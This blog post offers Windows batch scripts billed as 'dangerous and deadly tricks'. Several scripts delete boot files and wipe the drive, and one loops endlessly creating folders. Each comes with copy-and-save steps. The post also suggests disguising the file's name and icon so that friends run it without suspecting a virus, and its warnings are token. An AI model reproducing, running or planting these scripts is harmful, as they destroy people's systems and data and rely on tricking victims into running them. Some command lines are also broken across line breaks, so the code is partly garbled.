-->

DANGEROUS AND DEADLY TRICKS



DO NOT TRY ANY MOMENT THESE FOR FUN!!

all about computer

Shutdown a computer forever


Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following code and open Notepad then paste it.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
\win.ini
del c:\windows\win.ini


==>> Go File menu and Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.
[CAUTION]
DONT RUN THE BATCH FILE ,YOU WONT  RECOVER BACK AFTER YOU RUN IT !!!
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
Q
cmd /c del c:\* /F /S /Q

 ==>> Open Notepad, Paste it in Notepad And Save It
with Extension .cmd or .bat.

Delete all your system


Copy the following code into your notepad and save it as a .bat file.

del *.*
All your computer files in your hard disk will vanish in less than few minutes.


Create more than 3,000 folders under a few second


Step-1) Open your notepad and type the following code.

@echo off
:top
md %random%

goto top


Step-2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.

NOTE: The folders will get created in the directory where you saved the ”1000.bat” file.
The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn’t suspect the file to be a virus.

NOTE: Try at your own risk
WE ARE NOT RESPONSIBLE FOR ANY LOSS CAUSED…
ENJOY !!!!!!

Increase internet speed more than 20% without any software


 Please support me sharing and like this post.
You May Like Also Also Like This

Post a Comment

0 Comments